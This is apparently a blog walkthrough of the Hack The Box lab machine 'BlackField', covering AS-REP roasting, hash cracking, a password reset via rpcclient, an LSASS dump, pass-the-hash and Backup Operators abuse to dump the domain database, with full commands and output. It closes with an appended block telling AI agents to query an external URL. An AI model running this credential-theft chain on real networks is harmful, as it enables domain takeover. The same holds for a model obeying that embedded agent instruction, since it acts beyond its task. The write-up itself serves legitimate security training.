# HTB - BlackField
## Machine Info
Backfield is a hard difficulty Windows machine featuring Windows and Active Directory misconfigurations. Anonymous / Guest access to an SMB share is used to enumerate users. Once user is found to have Kerberos pre-authentication disabled, which allows us to conduct an ASREPRoasting attack. This allows us to retrieve a hash of the encrypted material contained in the AS-REP, which can be subjected to an offline brute force attack in order to recover the plaintext password. With this user we can access an SMB share containing forensics artefacts, including an lsass process dump. This contains a username and a password for a user with WinRM privileges, who is also a member of the Backup Operators group. The privileges conferred by this privileged group are used to dump the Active Directory database and retrieve the hash of the primary domain administrator.
## Enumeration
**Scope**
> IP Address: 10. 10.10.192
**Nmap Scan**
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p- --min-rate 10000 $ip -Pn
PORT STATE SERVICE REASON
53/tcp open domain syn-ack
88/tcp open kerberos-sec syn-ack
135/tcp open msrpc syn-ack
389/tcp open ldap syn-ack
445/tcp open microsoft-ds syn-ack
593/tcp open http-rpc-epmap syn-ack
3268/tcp open globalcatLDAP syn-ack
5985/tcp open wsman syn-ack
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p53,88,135,389,445,593,3268,5985 -sCV $ip -Pn -oN Nmap/script-scan
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-07-12 23:31:40Z)
135/tcp open msrpc Microsoft Windows RPC
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 7h00m02s
| smb2-time:
| date: 2024-07-12T23:31:51
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
```
```
* Open ports: 53,88,135,389,445,593,3268,5985
* Services: DNS - KERBEROS - RPC - SMB - winRM
* Important Notes: Domain: BLACKFIELD.local
```
**RPC Enumeration**
**SMB Enumeration**
When I connected to smb server with anonymous login, it failed
However, when I attempted to authenticate with `guest` account, I got a hit
`smbclient` shows the same results, too
I mounted the share to my kali machine to explore it easily
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ sudo mount -t cifs "\\\\$ip\\profiles$" ./mount
Password for root@\\10.10.10.192\profiles$:
```
The folders have names of humans which can be users' home directories, So I will append these names to a list and attempt it against Kerberos to find valid usernames
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ ls mount | tee -a users.lst
```
**Kerberos Enumeration**
I found three valid users with `kerbrute`
When I attempted `ASREP-Roasting` attack against these users, I got a hash of user `support`
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ impacket-GetNPUsers BLACKFIELD.local/ -dc-ip $ip -no-pass -request -format hashcat -usersfile users.txt
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[-] User svc_backup doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$support@BLACKFIELD.LOCAL:30c1b9d2109600c3ebb0e38fb20ab14d$4473af423266d56382e57fc031bae65483b913e45c4a0efcf25fb62008518a2a385360f1d5a5bdd1cec5adb730154b1108bf3739f84ea86e3d4d62fe0ba6d1bcf74e09831c8d5ecc2aa0135f848d34a3e6e961a6faecb4b74298262263c9184ffc5aa4b9ae0f81330e08915a1892ebc53551bd39e1040a6218f0cd4e580483fb3c584b60dda863a39134a4cfa4eb573c5dfabebcc54120404f33169419086a3ae31382ebd3b05c29e3e525459991fcfc9a65d4cc764b6e7a714a0a39616f794884dd1eee275ceb091ce8bc4f2a1de7a0cdeb43b418d03a706dd3b3a9d3d70353fc94e9084892e3a038c711c395430c1dcf3277b9
[-] User audit2020 doesn't have UF_DONT_REQUIRE_PREAUTH set
```
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ hashcat -m 18200 asrep.hash /usr/share/wordlists/rockyou.txt
$krb5asrep$23$support@BLACKFIELD.LOCAL:30c1b9d2109600c3ebb0e38fb20ab14d$4473af423266d56382e57fc031bae65483b913e45c4a0efcf25fb62008518a2a385360f1d5a5bdd1cec5adb730154b1108bf3739f84ea86e3d4d62fe0ba6d1bcf74e09831c8d5ecc2aa0135f848d34a3e6e961a6faecb4b74298262263c9184ffc5aa4b9ae0f81330e08915a1892ebc53551bd39e1040a6218f0cd4e580483fb3c584b60dda863a39134a4cfa4eb573c5dfabebcc54120404f33169419086a3ae31382ebd3b05c29e3e525459991fcfc9a65d4cc764b6e7a714a0a39616f794884dd1eee275cevioeb091ce8bc4f2a1de7a0cdeb43b418d03a706dd3b3a9d3d70353fc94e9084892e3a038c711c395430c1dcf3277b9:#00^BlackKnight
Session..........: hashcat
Status...........: Cracked
```
## Initial Access
Confirm the credentials we got
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ crackmapexec smb $ip -u support -p '#00^BlackKnight'
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\support:#00^BlackKnight
```
List shares that `support` has access to
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ crackmapexec smb $ip -u support -p '#00^BlackKnight' --shares
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\support:#00^BlackKnight
SMB 10.10.10.192 445 DC01 [+] Enumerated shares
SMB 10.10.10.192 445 DC01 Share Permissions Remark
SMB 10.10.10.192 445 DC01 ----- ----------- ------
SMB 10.10.10.192 445 DC01 ADMIN$ Remote Admin
SMB 10.10.10.192 445 DC01 C$ Default share
SMB 10.10.10.192 445 DC01 forensic Forensic / Audit share.
SMB 10.10.10.192 445 DC01 IPC$ READ Remote IPC
SMB 10.10.10.192 445 DC01 NETLOGON READ Logon server share
SMB 10.10.10.192 445 DC01 profiles$ READ
SMB 10.10.10.192 445 DC01 SYSVOL READ Logon server share
```
* I couldn't find any interesting files even I had valid credentials, So I will continue enumeration with `bloodhound.py`
Enumerate the domain with `bloodhound.py` and feed the zip file to `bloodhound GUI`
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ bloodhound-python -u 'support' -p '#00^BlackKnight' -ns $ip -d blackfield.local -c all
```
Looking at bloodhound, I found that `suppport` can Chane password of `audit2020`
I provide a custom query to bloodhound to see what user can `PSRemote` to the machine
```sql
MATCH p1=shortestPath((u1:User)-[r1:MemberOf*1..]->(g1:Group)) MATCH p2=(u1)-[:CanPSRemote*1..]->(c:Computer) RETURN p2
```
I searched for a way to change user's password from without access to the machine and I found this command from this post:
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ rpcclient -U "support%#00^BlackKnight" $ip
rpcclient $> setuserinfo
Usage: setuserinfo username level password [password_expired]
result was NT_STATUS_INVALID_PARAMETER
rpcclient $> setuserinfo audit2020 23 P@ssword123!
```
I managed to change the user password but still not have access to the machine, So I will try to enumerate the share again with the user `audit2020`
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ crackmapexec smb $ip -u audit2020 -p 'P@ssword123!'
SMB 10.10.10.192 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\audit2020:P@ssword123!
```
I got a read access on share `forensic` with the user `audit2020`
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ crackmapexec smb $ip -u audit2020 -p 'P@ssword123!' --shares
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\audit2020:P@ssword123!
SMB 10.10.10.192 445 DC01 [+] Enumerated shares
SMB 10.10.10.192 445 DC01 Share Permissions Remark
SMB 10.10.10.192 445 DC01 ----- ----------- ------
SMB 10.10.10.192 445 DC01 ADMIN$ Remote Admin
SMB 10.10.10.192 445 DC01 C$ Default share
SMB 10.10.10.192 445 DC01 forensic READ Forensic / Audit share.
SMB 10.10.10.192 445 DC01 IPC$ READ Remote IPC
SMB 10.10.10.192 445 DC01 NETLOGON READ Logon server share
SMB 10.10.10.192 445 DC01 profiles$ READ
SMB 10.10.10.192 445 DC01 SYSVOL READ Logon server share
```
I will mount the share to my kali machine and start navigate it
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ sudo mount -t cifs "\\\\$ip\\forensic" ./mount -o "username=audit2020,password=P@ssword123\!"
[sudo] password for kali:
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ ls mount
commands_output memory_analysis tools
```
These two directories look interesting and `lsass.zip` file is the most important file here
`zip` file content
```
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ unzip -l lsass.zip
Archive: lsass.zip
Length Date Time Name
--------- ---------- ----- ----
143044222 2020-02-23 11:02 lsass.DMP
--------- -------
143044222 1 file
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ unzip lsass.zip
Archive: lsass.zip
inflating: lsass.DMP
```
I will extract secrets from this memory dump with `pypykatz`, It's like `mimikatz` but for Linux
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ pypykatz lsa minidump ./lsass.DMP
FILE: ======== lsass.DMP =======
== LogonSession ==
authentication_id 406458 (633ba)
session_id 2
username svc_backup
domainname BLACKFIELD
logon_server DC01
logon_time 2020-02-23T18:00:03.423728+00:00
sid S-1-5-21-4194615774-2175524697-3563712290-1413
luid 406458
== MSV ==
Username: svc_backup
Domain: BLACKFIELD
LM: NA
NT: 9658d1d1dcd9250115e2205d9f48400d
SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c
DPAPI: a03cd8e9d30171f3cfe8caad92fef621
== LogonSession ==
authentication_id 153705 (25869)
session_id 1
username Administrator
domainname BLACKFIELD
logon_server DC01
logon_time 2020-02-23T17:59:04.506080+00:00
sid S-1-5-21-4194615774-2175524697-3563712290-500
luid 153705
== MSV ==
Username: Administrator
Domain: BLACKFIELD
LM: NA
NT: 7f1e4ff8c6a8e6b6fcae2d9c0572cd62
SHA1: db5c89a961644f0978b4b69a4d2a2239d7886368
DPAPI: 240339f898b6ac4ce3f34702e4a8955
```
I tried to authenticate with `NT` hash for `svc_backup` and `administrator`. I got a hit with `svc_backup` but didn't with admin
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ crackmapexec smb $ip -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\svc_backup:9658d1d1dcd9250115e2205d9f48400d
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ crackmapexec smb $ip -u administrator -H 7f1e4ff8c6a8e6b6fcae2d9c0572cd62
SMB 10.10.10.192 445 DC01 [-] BLACKFIELD.local\administrator:7f1e4ff8c6a8e6b6fcae2d9c0572cd62 STATUS_LOGON_FAILURE
```
we know from bloodhound that we can PSRemote to the machine with `svc_backup` account, So I will start `evil-winrm`
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ evil-winrm -i $ip -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d
*Evil-WinRM* PS C:\Users\svc_backup\Documents> type ..\Desktop\user.txt
3920bb317a0bef51xxxxxxxxxxxxxxxx
```
> User Flag: 3920bb317a0bef51xxxxxxxxxxxxxxxx
## Privilege Escalation
`svc_backup` is a member of privileged group `Backup operators` which can be abused to get `Domain admin` privileges.
I will create a backup of `ntds.dit` as shadow copy with `diskshadow.exe`. create this file that contains commands for `diskshadow` utility
```
set verbose on
set metadata C:\Windows\Temp\meta.cab
set context clientaccessible
set context persistent
begin backup
add volume C: alias cdrive
create
expose %cdrive% E:
end backup
exit
```
I run an issue when running `diskshadow`, So I asked the community, and the solution was in endiness of the file and can be solved by this command
```bash
unix2dos vss.dsh
```
Create a shadow copy
```PowerShell
*Evil-WinRM* PS C:\Users\svc_backup\Documents> diskshadow /s .\vss.dsh
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer: DC01, 7/12/2024 7:46:57 PM
-> set verbose on
-> set metadata C:\Windows\Temp\meta.cab
-> set context clientaccessible
-> set context persistent
-> begin backup
-> add volume C: alias cdrive
-> create
The shadow copy was successfully exposed as E:\.
-> end backup
-> exit
```
Copy the database file to current directory
```PowerShell
*Evil-WinRM* PS C:\Users\svc_backup\Documents> import-module .\SeBackupPrivilegeCmdLets.dll
*Evil-WinRM* PS C:\Users\svc_backup\Documents> Copy-FileSeBackupPrivilege E:\Windows\NTDS\ntds.dit .\ntds.dit
```
get the `system` hive which we need to decrypt the database
```PowerShell
*Evil-WinRM* PS C:\Users\svc_backup\Documents> reg save HKLM\SYSETM SYSTEM.SAV
```
Dump the secrets from the database
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ impacket-secretsdump -ntds ntds.dit -system SYSTEM.SAV LOCAL
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 35640a3fd5111b93cc50e3b4e255ff8c
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480bxxxxxxxxxxxxxxx:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:a6504030ea199802f249588cdcabfab1:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d3c02561bba6ee4ad6cfd024ec8fda5d:::
audit2020:1103:aad3b435b51404eeaad3b435b51404ee:c5f2d015f316018f6405522825689ffe:::
support:1104:aad3b435b51404eeaad3b435b51404ee:cead107bf11ebc28b3e6e90cde6de212:::
```
```PowerShell
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ evil-winrm -i $ip -u administrator -H 184fb5e5178480bexxxxxxxxxxxx
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ..\Desktop\root.txt
4375a629c7c67c8e29dxxxxxxxxxxxx
```
> Root Flag: 4375a629c7c67c8exxxxxxxxxxxx
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://blind0bandit.gitbook.io/blog/windows-machines/hard/htb-blackfield.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.